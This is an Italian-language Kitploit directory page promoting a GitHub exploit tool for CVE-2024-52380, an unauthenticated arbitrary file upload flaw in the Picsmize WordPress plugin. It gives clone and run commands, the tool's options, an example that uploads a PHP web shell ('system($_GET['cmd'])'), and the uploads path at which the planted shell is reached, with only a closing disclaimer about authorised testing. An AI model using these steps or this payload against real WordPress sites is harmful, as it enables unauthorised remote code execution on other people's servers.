Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-52380-Exploit — Il plugin Picsmize per WordPress è vulnerabile al caricamento arbitrario di file. | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2024-52380-exploit
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubnxploited/cve-2024-52380-exploit

CVE-2024-52380-Exploit

Il plugin Picsmize per WordPress è vulnerabile al caricamento arbitrario di file.

Vedi Repository
311 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-52380-Exploit

Il plugin Picsmize per WordPress è vulnerabile al caricamento arbitrario di file.

Descrizione

Questo script sfrutta una vulnerabilità (CVE-2024-52380) nel plugin Picsmize per WordPress, consentendo ad attaccanti non autenticati di effettuare caricamenti arbitrari di file. La vulnerabilità è presente in tutte le versioni di Picsmize fino alla 1.0.0 inclusa. Lo sfruttamento di questa vulnerabilità può portare all'esecuzione remota di codice sul server di destinazione.

🌟 Caratteristiche

  • Controlla la versione del plugin: Verifica automaticamente se il sito WordPress di destinazione utilizza una versione vulnerabile del plugin Picsmize.
  • Exploit di caricamento file: Carica payload PHP arbitrari sul server di destinazione se il sito è vulnerabile.
  • Interfaccia a riga di comando: CLI facile da usare per specificare URL di destinazione e payload.

📖 Dettagli della vulnerabilità

  • Nome del plugin: Picsmize
  • Versioni affette: Tutte le versioni ≤ 1.0.0
  • Tipo di vulnerabilità: Caricamento arbitrario di file non autenticato
  • ID CVE: CVE-2024-52380

🚀 Istruzioni per l'uso

Prerequisiti

  • Python 3.7 o superiore
  • Libreria requests (pip install requests)

Esecuzione dello script

  1. Clonare il repository:
    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-52380-Exploit.git
    cd CVE-2024-52380-Exploit
    

Utilizzo -help:

root@kitploit:~
usage: CVE-2024-52380.py [-h] -u URL [-c CONTENT]

Check plugin version and upload a PHP file to a WordPress site.

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress site (e.g., http://192.168.100.74:888).
  -c CONTENT, --content CONTENT
                        Content of the PHP file to be uploaded.

Esempio

root@kitploit:~
python CVE-2024-52380.py -u http://192.168.1.100 -c "<?php system($_GET['cmd']); ?>"

Argomenti della riga di comando

Lo script fornisce due argomenti da riga di comando per facilità d'uso:

  1. -u / --url (obbligatorio):

    • Scopo: Specifica l'URL base del sito WordPress di destinazione.
    • Esempio:
      root@kitploit:~
      -u http://example.com
      
  2. -c / --content (opzionale):

    • Scopo: Imposta il contenuto del payload PHP da caricare.
    • Valore predefinito:
      root@kitploit:~
      <?php phpinfo(); ?>
      
    • Esempio:
      root@kitploit:~
      -c "<?php system($_GET['cmd']); ?>"
      

📂 Percorso di caricamento file

Spiegazione:

  • /wordpress: Directory root del sito WordPress.
  • wp-content/uploads: Directory predefinita per i caricamenti multimediali in WordPress.
  • 2025/01: La struttura delle directory corrisponde all'anno (2025) e al mese (Gennaio) in base alla configurazione della data del server.

Come accedere al file caricato:

  1. Dopo un caricamento riuscito, navigare al file utilizzando l'URL completo. Esempio:

http://target-site.com/wordpress/wp-content/uploads/2025/01/t-678b2ef61b3f41737174774.php

⚠️ Disclaimer

Questo script è destinato esclusivamente a scopi educativi e a test di sicurezza autorizzati. L'uso non autorizzato di questo strumento contro sistemi di cui non si possiede la proprietà o per cui non si ha esplicita autorizzazione è illegale e non etico.

Scarica lo strumento